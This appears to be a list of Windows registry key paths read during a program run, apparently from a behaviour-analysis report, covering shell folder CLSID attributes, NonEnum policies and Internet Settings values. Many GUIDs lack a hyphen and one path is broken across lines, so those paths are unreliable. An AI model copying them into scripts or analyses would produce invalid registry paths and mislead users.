HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D808002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D708002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D}
{000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\wsmprovhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{031E4825-7B94-4DC3-B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{04731B67-D933-450A-90E6-4ACD2E9408FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\NoFileFolderJunction
